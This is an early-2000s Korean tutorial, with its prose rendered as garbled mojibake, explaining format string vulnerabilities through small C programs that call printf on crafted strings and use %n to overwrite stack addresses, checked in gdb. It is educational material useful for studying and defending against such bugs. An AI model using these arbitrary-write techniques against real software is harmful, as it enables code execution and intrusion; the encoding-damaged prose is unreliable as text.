======================================================================================= Title: format string ¿ø¸® ÀÌÇØ Author : À¯µ¿ÈÆ (Xpl017Elz) in INetCop E-mail : szoahc@hotmail.com Home: http://x82.i21c.net Date: f.2001/12/07 s.2002/03/22 ======================================================================================= P.S: ´Ü¼øÈ÷ format string ±â¹ýÀ» ÀÌ¿ëÇÑ exploit º¸´Ù´Â È®½ÇÇÑ °³³äÀ» ÀÌÇØÇÏ°í ±× ¿ø¸®¸¦ ÀÌÇØÇÏ´Â °ÍÀÌ Áß¿äÇÏ´Ù°í »ý°¢ÇÕ´Ï´Ù. ±âÁ¸¿¡ ÀÛ¼ºÇغ¸¾Ò´ø ¹®¼­ ÀÛ¼º°ú´Â ´Ù¸¥ °üÁ¡¿¡¼­ Á¢±ÙÀ» ½ÃµµÇغ¸¾Ò½À´Ï´Ù. Âü°í·Î, ÀÌ ¹®¼­ÀÇ ³»¿ëÀº Á¤½ÄÀ¸·Î ´Ùµë¾îÁø ÀûÀÌ ¾ø±â ¶§¹®¿¡ ÁöÀúºÐÇÏ°í, Àб⿡ »ó´çÇÑ ºÒÆíÀÌ µû¸¦ ¼ö ÀÖ½À´Ï´Ù. --; ¿øÇÏ´Â ÁÖ¼Ò¿¡ ÀÓÀÇÀÇ °ªÀ» µ¤¾î¾²±â À§ÇØ ´ÙÀ½°ú °°ÀÌ test Çغ¸¾Ò½À´Ï´Ù. "%n" µð·ºÆ¼ºêÀÇ Æ¯¼º»ó, ÁÖ¾îÁø ÁÖ¼Ò¿¡ °ªÀ» µ¤¾î¾²±â ÇÕ´Ï´Ù. src: -- main() { char x0x[0x82]="\x30\xfc\xff\xbf%00100n"; printf(x0x); } -- ÁÖ¼ÒÀÎ 0xbffffc30À» ¸ÕÀú Á¦½ÃÇØÁÖ¾ú°í¿ä. (ÁÖ¼Ò´Â Âü°í·Î, ¸®Æ²¿£µð¾È Æ÷¸Ë ¹æ½ÄÀÔ´Ï´Ù.) ±×°Í¿¡ ¸ÂÃß¾î format string("%00100n")À» ³Ö¾îº¸¾Ò½À´Ï´Ù. bash$ gcc -otest test.c && gdb -q test (gdb) br *main+66 Breakpoint 1 at 0x804843a (gdb) r Starting program: /tmp/test Breakpoint 1, 0x804843a in main () (gdb) x 0xbffffc30 0xbffffc30: 0x00000004 (gdb) q The program is running. Exit anyway? (y or n) y bash$ µ¤¾î¾²·Á°í Çß´ø 0xbffffc30ÀÇ ÁÖ¼Ò°ªÀ» °üÂûÇغ» °á°ú, °ª 4byte°¡ ¾²¿´ÁÒ. (±× ÀÌÀ¯´Â format string ¾Õ¿¡ "\x30\xfc\xff\xbf"¸¦ ³Ö¾îÁÖ¾ú±â ¶§¹®ÀÔ´Ï´Ù) "%n"ÀÌ ÇöÀç±îÁö ¾²¿©Áø °ªÀ» ÁÖ¾îÁØ ÁÖ¼Ò(0xbffffc30)¿¡ ÀúÀåÇØÁÖ¾ú½À´Ï´Ù. ¾Õ¿¡ 100byte¶ó´Â Å©±â¸¦ ÁÖ¾îÁÖ¾ú´Âµ¥µµ, ÀüÇô »ó°ü¾øÀÌ 4byte¸¸ ÀúÀåÇßÁÒ. ^^ (ÀüÇô »ó°ü¾øÀ½.) ±×·¯¸é, À̹ø¿£ ¾Õ¿¡ °ªÀ» Áý¾î ³Ö¾î stack¿¡ ¾´ ÈÄ "%n"À¸·Î ÀúÀåÇغ¸°Ú½À´Ï´Ù. src´Â ´ÙÀ½°ú °°ÀÌ º¯°æÇØÁÖ¾î¾ß ÇÕ´Ï´Ù. ±× ÀÌÀ¯´Â format stringÀÌ ´Ã¾î³µ±â ¶§¹®ÀÔ´Ï´Ù. 0xbffffc30 ÁÖ¼Ò°ªÀÌ "%n" µð·ºÆ¼ºê¿Í »óµîÇÏ°Ô ÇØÁÖ·Á¸é, ¾Õ¿¡ offset°ú format stringÀ» ³Ö¾îÁÖ¾î¾ß ÇÏÁÒ. Àú°°Àº °æ¿ì AAAA·Î offset¸¦ ä¿öÁÖ¾ú°í¿ä, "%x"¸¦ µÎ°³ ³Ö¾î¼­ 0xbffffc30 ÁÖ¼Ò¿¡ "%n" µð·ºÆ¼ºê°¡ ÁÖ¼Ò¿¡ °ªÀ» ÀúÀåÇÒ ¼ö ÀÖµµ·Ï ÇÏ¿´½À´Ï´Ù. ±×·¯³ª, stack¿¡ ÀúÀåµÈ ÁÖ¼Ò°ª°ú Ãâ·ÂµÇ´Â ÁÖ¼Ò¸¦ ¸ÂÃâ °æ¿ì¿¡ (0xbffffc30<->%n) ¹®Á¦°¡ ¹ß»ýÇÒ ¼ö Àִµ¥¿ä. ÀÌ °æ¿ì´Â "format string("%x")À¸·Î Ãâ·ÂÇÏ´Â stack¿¡ ÀÖ´Â °ªÀÌ 8bit°¡ ¾ÈµÉ °æ¿ì¿¡ ¹ß»ýÇÕ´Ï´Ù. (Áï, align:4byte°¡ ¾Æ´Ò °æ¿ì) À̸¦ À§ÇØ °ø°ÝÀÚ´Â format string ¾Õ¿¡ °ªÀ» Á༭ align:4byte¸¦ ¸ÂÃä´Ï´Ù. ^^ "%8x" <- ÀÌ·¸°Ô ½á¼­ Ç¥ÇöÇÒ ¼ö ÀÖ½À´Ï´Ù. (0x0À» 0x00000000·Î ¸ÂÃß¾î Ãâ·ÂÇÔ. ¶ÇÇÑ, align:4·Î °è»êÇϱâ ÁÁÀ½) ¸¸¾à Ãâ·ÂÇÏ´Â stack ¾ÈÀÇ °ªÀÌ ÀüºÎ 4byte alignÀ¸·Î ¶È¹Ù¸£°Ô ÀúÀåµÇ¾î ÀÖ´Ù¸é, ÀÌ ¹®Á¦´Â °ÆÁ¤ÇÏÁö ¾Ê¾Æµµ µË´Ï´Ù. ±×·¯³ª, ´ëºÎºÐ stack ÀϺκÐÀÇ ³»¿ë¿¡ 0x0µµ Æ÷ÇԵǴ °æ¿ì°¡ ¸¹±â ¶§¹®¿¡ "%8x"¸¦ ³Ö¾î °ªÀ» °è»êÇÏ´Â°Ô Æí¸®ÇÏÁÒ. ÀÚ, ¼öÁ¤Çغ¸¾Ò½À´Ï´Ù. src: -- main() { char x0x[0x82]="AAAA\x90\xfc\xff\xbf%x%x%00100x%n"; printf(x0x); } -- "%x%x"°¡ µé¾î°¬´Âµ¥¿ä.. Á¦ °æ¿ì¿¡´Â debuggingÇÒ¶§ ÀüºÎ 4byte alignÀ» °®Ãá 16bit °ªÀÌ ¶Ñ·ÇÇÏ°Ô Ãâ·ÂµÇ¾ú±â ¶§¹®¿¡ ÀÌ·¸°Ô ³Ö¾îÁØ°Ì´Ï´Ù. ¿©·¯ºÐÀÇ °æ¿ì´Â Ȥ½Ã ¸ð¸£´Ï "%8x"·Î ³Ö¾î °è»êÇØÁÖ¼¼¿ä. debugging °á°ú´Â ´ÙÀ½°ú °°½À´Ï´Ù. Breakpoint 1, 0x8048440 in main () (gdb) x 0xbffffc90 0xbffffc90: 0x0000007c (gdb) 0x7c´Â 124byte³×¿ä. ¸ÕÀú, "%00100x"À» ÅëÇØ 100byte¸¦ »ç¿ëÇß°í¿ä. ¾ÕºÎºÐ¿¡ "AAAA\x90\xfc\xff\xbf"°¡ 8byte, "%x%x"´Â 16byteÀÔ´Ï´Ù. ´Ù ´õÇϸé ... 100 + 8 + 16 = 124byte ³×, ÀüºÎ 124byte°¡ ¸Â³×¿ä. ^^ ±×·¯¸é, Àå³­»ï¾Æ 0xbffffc30¿¡ 0x4141 °ªÀ» Áý¾î³Ö¾î º¼±î¿ä? 0x4141Àº 10Áø¼ö·Î 16705ÀÔ´Ï´Ù. "AAAA\x30\xfc\xff\xbf" : 8byte %x%x : 16byte ÃÑ 24byte ÀÔ´Ï´Ù. °á±¹, 16681byte¸¦ format string¿¡ ´ã¾Æ stack»ó¿¡ ³Ö¾îÁÖ¸é µÇ°Ú±º¿ä. ÀÚ ±×·³, ³Ö¾îº¸°Ú½À´Ï´Ù. src: -- main() { char x0x[0x82]="AAAA\x30\xfc\xff\xbf%x%x%16681x%n"; printf(x0x); } -- bash$ gcc -o test test.c && gdb -q test (gdb) br *main+72 Breakpoint 1 at 0x8048440 (gdb) r Starting program: /tmp/test AAAA0üÿ¿4000a610bffffb04 ... Áß ·« ... Breakpoint 1, 0x8048440 in main () (gdb) x 0xbffffc30 0xbffffc30: 0x00004141 (gdb) ÁÁ½À´Ï´Ù. ^^ °ø°ÝÀÚ°¡ ¿øÇÏ´Â ÁÖ¼Ò¿¡ ¾î¶»°Ô °ªÀ» µ¤¾î ¾²´ÂÁö °øºÎÇØ º¸¾Ò½À´Ï´Ù. ±×·¯³ª, ½ÇÁ¦ exploit±îÁö´Â ´Ù¼Ò ÀÀ¿ëÀÌ ÇÊ¿äÇÕ´Ï´Ù. À§¿¡¼­ ó·³ return address¿¡ »ç¿ëÀÚ°¡ ÀÔ·ÂÇÑ ¸¸Å­À» ÀúÀåÇÑ´Ù°í Çصµ.. shellcode°¡ ÀÖ´Â Áï, °ø°ÝÀÚ°¡ ¿øÇÏ´Â ÁÖ¼Ò·Î º¯°æÇÏ·Á¸é, Çѹø¿¡´Â ´Ù µ¤¾î¾²Áö ¸øÇÕ´Ï´Ù. ±× ÀÌÀ¯´Â format stringÀÇ °ªÀÌ ³Ê¹« Ä¿¼­ ±×·¸½À´Ï´Ù.. (0xbffffc30À» 10Áø¼ö·Î º¯È¯Çغ¸¸é, 3221334496ÀÌ ³ª¿À³×¿ä.) À½... ¾ÈÁÁ±º¿ä. :-( ±×·¯³ª, ´Ù¸¥ ÁÁÀº ¹æ¹ýÀÌ ÀÖ½À´Ï´Ù. ^^ ¹Ù·Î, format stringÀ» ¿©·¯°³ »ç¿ëÇÏ¿© ÁÖ¼Ò¸¦ ÂÉ°³ ³Ö´Â°ÅÁÒ. ³Ö°íÀÚ ÇÏ´Â ÁÖ¼Ò.. (À§¿¡¼­´Â 0x7c¶û, 0x4141À» Å×½ºÆ® Çغ¸¾Ò½À´Ï´Ù¸¸)¸¦ ³ª´©¾î °è»êÇÏ´Â °Ì´Ï´Ù. ¸¸¾à 0x4141À» 16705·Î °è»êÇؼ­ Çѹø¿¡ °ªÀ» ³Ö¾îÁÖ¾ú´Ù¸é.. 0x41414141Àº 2byte¾¿ ÂÉ°³¼­ 2¹ø¿¡ °ÉÃÄ Áý¾î³ÖÀ» ¼ö ÀÖ½À´Ï´Ù. ±× ¹æ½ÄÀº °£´ÜÇѵ¥¿ä. ¸ÕÀú, ¾Æ±î¿Í °°ÀÌ format stringÀÌ Ãâ·ÂÇÒ ÀÎÀÚ¸¦ ¾Õ¿¡ Àû¾îÁ־ ±× ÁÖ¼Ò¸¦ ÂüÁ¶ÇÏ°Ô ¸¸µé°í¿ä. ("AAAA\x30\xfc\xff\xbf") ±× ´ÙÀ½ À̾ µ¤¾î¾µ ÁÖ¼Ò¸¦ ³Ö¾îÁÝ´Ï´Ù. ("ZZZZ\x32\xfc\xff\xbf") 0xbffffc30 ÁÖ¼Ò¿¡ 2byte¸¦ µ¤¾î¾´ ÈÄ, 0xbffffc32 ÁÖ¼Ò¿¡ ³²Àº 2byte¸¦ ¸¶Á® µ¤¾î¾²¸é µÇ°ÚÁÒ. ´Ù½Ã, ´Ü¼øÇÑ test¸¦ Çغ¸°Ú½À´Ï´Ù. src: -- main() { char x0x[0x82]="AAAA\x30\xfc\xff\xbfZZZZ\x32\xfc\xff\xbf%x%x%00010x%n%00010x%n"; printf(x0x); } -- ¸¶Âù°¡Áö·Î, "%x%x"´Â ÁÖ¼Ò°ª°ú "%n" µð·ºÆ¼ºê°¡ »óµîÇϵµ·Ï ¸ÂÃá offset 16byte°í¿ä. ÂüÁ¶¸¦ À§ÇÑ ÁÖ¼Ò°ª, "AAAA\x30\xfc\xff\xbfZZZZ\x32\xfc\xff\xbf" ¿ª½Ã 16byteÀÔ´Ï´Ù. ¹ú½á ¾²¿©Áø °ªÀÌ 32byte±º¿ä.. ¿©±â¼­ ù¹ø° format string "%00010x"±îÁö ÇÕÇϸé, ÃÑ 42byte°¡ µË´Ï´Ù. ±×¸®°í, "%n" µð·ºÆ¼ºê·Î µ¤¾î¾¹´Ï´Ù. ´ÙÀ½, µÎ¹ø° format stringÀ¸·Î "%00010x"¸¦ ÇÕ»êÇϸé, 52byte°¡ µË´Ï´Ù. ±×¸®°í ÀÌ °ª ¶ÇÇÑ, "%n" µð·ºÆ¼ºê·Î µ¤¾î¾¹´Ï´Ù. °á±¹, 0xbffffc30¿¡ °ª 42¸¦ ÀúÀåÇؾßÇÏ°í, 0xbffffc32¿¡ °ª 52°¡ ÀúÀåµÇ¾ß ÇÕ´Ï´Ù. Çѹø È®ÀÎÇغ¼±î¿ä? (gdb) br *main+73 Breakpoint 1 at 0x8048441 (gdb) r Starting program: /tmp/test Breakpoint 1, 0x8048441 in main () (gdb) x 0xbffffc30 0xbffffc30: 0x0034002a (gdb) 0xbffffc30¿¡´Â 0x2a°¡ ÀúÀåµÇ¾î ÀÖ°í¿ä, 0xbffffc32¿¡´Â 0x34°¡ ÀúÀåµÇ¾î ÀÖ´Â °ÍÀ» º¼ ¼ö ÀÖ½À´Ï´Ù. 10Áø¼ö·Î º¯°æÇϸé, 0x2a´Â 42°í, 0x34´Â 52°¡ ¸Â´Â °ÍÀ» È®ÀÎÇÒ ¼ö ÀÖ½À´Ï´Ù. :-) ÀÚ, ÀÌÁ¦ ¿ø¸®´Â ´Ù °øºÎÇß½À´Ï´Ù. ½ÇÁ¦ 0xbffffc30¿¡ °ø°ÝÀÚ°¡ ÁÖ¾îÁÖ´Â ÀÓÀÇÀÇ °ª 0x41414141À» µ¤¾î½áº¸µµ·Ï ÇÏ°Ú½À´Ï´Ù. src: -- main() { char x0x[0x82]= "\x41\x41\x41\x41\x30\xfc\xff\xbf" "\x41\x41\x41\x41\x32\xfc\xff\xbf" "%x%x%16673x%n%65536x%n"; printf(x0x); } -- 16673Àº 0x4141¿¡¼­ 32 °ªÀ» Á¦¿ÜÇÑ ÁÖ¼ÒÀÔ´Ï´Ù. ´ÙÀ½, µÚ¿¡ µ¤¾î¾µ °ªÀº ÀÌ¹Ì ¾²¿©Áø °ªµéÀ» »«, ¼ø¼ö ³ª¸ÓÁö ÁÖ¼Ò°¡ µÇ°ÚÁÒ? °á±¹, °ø½ÄÀº ´ÙÀ½°ú °°½À´Ï´Ù. (0x4141 - 0x4141) - 32 ±×·±µ¥ ¹®Á¦°¡ ¹ß»ýÇÏ´Â ±º¿ä. 0x4141À» »©¹ö¸®¸é, ³²´Â °ªÀº 0À̳׿ä. ÀÌ°ÍÀº ´ÙÀ½°ú °°ÀÌ ÇØ°áÇÒ ¼ö ÀÖ½À´Ï´Ù. ¿ì¼±, 0x41414141À» 0xbffffc30 ÁÖ¼Ò¿¡¸¸ ³ÖÀ¸¸é µÇ±â ¶§¹®¿¡ 0xbffffc34¿¡ ´Ù¸¥ °ªÀÌ ¾²¿©µµ »ó°ü¾øÀ» °ÍÀÔ´Ï´Ù. ÀÚ ±×·¯¸é, 0x41414141ÀÌ ¾Æ´Ñ, 0x0141414141À» µ¤¾î¾º¿ö º¾½Ã´Ù. ÀÌ°ÍÀº 0xbffffc34¿¡ 0x01 1byte¸¦ ´õ µ¤¾î¾º¿ó´Ï´Ù. °á°úÀûÀ¸·Î 0xbffffc30 ~ 0xbffffc33 ±îÁö´Â 0x41414141¸¦ ¿Ïº®ÇÏ°Ô µ¤¾î¾º¿ï ¼ö ÀÖ´Â °ÍÀÔ´Ï´Ù. :-) ±×·¡¼­, 0x014141¿¡¼­ 0x4141¸¦ »¬¼ÀÇÏ¿´½À´Ï´Ù. 0x010000ÀÌ ³²ÁÒ? 10Áø¼ö·Î 65536ÀÌ µÇ´Â±º¿ä. ÀÌÁ¦ °è»êÇÑ °ªµéÀ» µ¤¾î½áº¸°Ú½À´Ï´Ù. (gdb) x/2 0xbffffc30 0xbffffc30: 0x41414141 0x69640001 (gdb) w0w~! °ø°Ý ÈÄ, ÀÌ»Ú°Ô µ¤¾î¾²ÀÎ °ÍÀ» º¼ ¼ö ÀÖ½À´Ï´Ù. ¹°·Ð, 0xbffffc34µµ 0x01°ª 1byte°¡ ÀúÀåµÇ¾úÁÒ. ½ÇÁ¦ ÁÖ¼Ò°ªµµ ÀÌ·±½ÄÀ¸·Î °è»êÇÏ¿© exploit ÇÕ´Ï´Ù. ±×·¸´Ù¸é, À̹ø¿£ µÎ¹ø overwrite ¹æ½ÄÀÌ ¾Æ´Ñ, ³×¹ø overwrite ¹æ½ÄÀ¸·Î µ¤¾î½áº¸µµ·Ï ÇÏ°Ú½À´Ï´Ù. src: -- main() { // 0xbffffc30 ÁÖ¼Ò¿¡ 0xbffffc30 °ª µ¤¾î¾²±â char x0x[100]= "\x41\x41\x41\x41\x30\xfc\xff\xbf" "\x41\x41\x41\x41\x31\xfc\xff\xbf" "\x41\x41\x41\x41\x32\xfc\xff\xbf" "\x41\x41\x41\x41\x33\xfc\xff\xbf" "%x%x%256x%n%204x%n%259x%n%192x%n"; printf(x0x); } Á» º¹ÀâÇغ¸ÀÌ´Â °Í °°Áö¸¸.. ÀüÇô ±×·¸Áö ¾Ê½À´Ï´Ù. ^^ ¿ì¼±, 4¹ø¿¡ µ¤¾î¾²±â ¶§¹®¿¡ 1byte¾¿ ¾´´Ù°í º¸½Ã¸é µË´Ï´Ù. ¾Õ¿¡ ÁÖ¼Ò°ª°ú offsetÀ» »©°í¿ä (32byte ¾²ÀÓ), ´ÙÀ½ "%x%x" format stringÀ» »®´Ï´Ù. (48byte ¾²ÀÓ) Áö±Ý±îÁö ¾²ÀÎ 48byte¸¦ »©¾ßÇϴµ¥¿ä. ¸¶Áö¸· ÀÚ¸®°¡ 0x30À̱⠶§¹®¿¡ »©¸é, 0ÀÌ ³²°Ú±º¿ä. :-( À̶§´Â, 0x130¿¡¼­ 48byte¸¦ »©ÁÝ´Ï´Ù. ±×·¸°Ô µÇ¸é, 0xbffffc30¿¡ 0x30À» µ¤¾î¾º¿î ÈÄ, 0xbffffc31¿¡ 0x01ÀÌ µ¤¾î¾º¿öÁý´Ï´Ù. (304byte ¾²ÀÓ) ´ÙÀ½, 0xfc¿¡¼­ 0x130À» »©·Á¸é, 0x1fc·Î ¸¸µé¾î °è»êÇØ¾ß ÇÕ´Ï´Ù. ±× °á°ú°ªÀº 10Áø¼ö·Î 204ÀÔ´Ï´Ù. (508byte ¾²ÀÓ) ´ÙÀ½, 0xff¿¡¼­ 0x1fc¸¦ »©¾ßÇÕ´Ï´Ù. À̰͵µ 0x1ff·Î ¸¸µé¾î °è»êÇÕ´Ï´Ù. ±×·¯³ª, ÀÌ·¸°Ô °è»êÇÏ¸é °á°ú°ªÀÌ 3ÀÌ ³²´Âµ¥¿ä. ³²´Â ¼ö°¡ ÀûÀº °ü°è·Î 0x0100À» ´õ ´õÇÏ¿© °è»êÇØÁÖ¾î¾ß ÇÕ´Ï´Ù. ±×·¯¹Ç·Î, 0x2ff¿¡¼­ 0x1fc¸¦ »©¸é, 259ÀÌ ³²½À´Ï´Ù. (767byte ¾²ÀÓ) ¸¶Áö¸·, 0x3bf¿¡¼­ 0x2ff¸¦ »©¸é, 192°¡ ³ª¿É´Ï´Ù. ÀüºÎ Á¤¸®Çؼ­ °è»êÇغ¸¸é, ÃÑ 959byteÀÇ data¸¦ »ç¿ëÇÏ´Â °ÍÀ» ¾Ë ¼ö ÀÖ½À´Ï´Ù. "\x41\x41\x41\x41\x30\xfc\xff\xbf" = 8 "\x41\x41\x41\x41\x31\xfc\xff\xbf" = 8 "\x41\x41\x41\x41\x32\xfc\xff\xbf" = 8 "\x41\x41\x41\x41\x33\xfc\xff\xbf" = 8 "%x%x" = 16 0xbffffc30: 0x0130 - 0x0030 = 256 0xbffffc31: 0x01fc - 0x0130 = 204 0xbffffc32: 0x02ff - 0x01fc = 259 0xbffffc33: 0x03bf - 0x02ff = 192 -------------------------------------------- ÇÕ°è: = 959byte ´ÙÀ½Àº ½ÇÇà ÈÄ debugging ÇÑ °á°úÀÔ´Ï´Ù. (gdb) x/2 0xbffffc30 0xbffffc30: 0xbffffc30 0x6b000003 (gdb) bingo!! :-D ÃÖÁ¾ÀûÀ¸·Î 0x03bffffc30 °ªÀ» µ¤¾î ½è½À´Ï´Ù. ´ÙÀ½ sampleÀº 0xbffffc30 ÁÖ¼Ò¿¡ 0x41414141À» µ¤¾î¾²°í, 0xbffffc34 ÁÖ¼Ò¿¡ 0xbffffc30À» µ¤¾î¾²´Â concept code ÀÔ´Ï´Ù. main() { char x0x[0x82]= "\x41\x41\x41\x41\x30\xfc\xff\xbf" "\x41\x41\x41\x41\x32\xfc\xff\xbf" "\x41\x41\x41\x41\x34\xfc\xff\xbf" "\x41\x41\x41\x41\x36\xfc\xff\xbf" "%x%x%16657x%n%65536x%n%47855x%n%50127x%n"; printf(x0x); } /* "\x41\x41\x41\x41\x30\xfc\xff\xbf" = 8 "\x41\x41\x41\x41\x32\xfc\xff\xbf" = 8 "\x41\x41\x41\x41\x34\xfc\xff\xbf" = 8 "\x41\x41\x41\x41\x36\xfc\xff\xbf" = 8 "%x%x" = 16 0xbffffc30: 0x004141 - 0x000030 = 16657 0xbffffc32: 0x014141 - 0x004141 = 65536 0xbffffc34: 0x01fc30 - 0x014141 = 47855 0xbffffc36: 0x02bfff - 0x01fc30 = 50127 ------------------------------------------------ total: = 180223byte (gdb) x/3 0xbffffc30 0xbffffc30: 0x41414141 0xbffffc30 0x67690002 (gdb) overwrite: 0x0002bffffc3041414141 */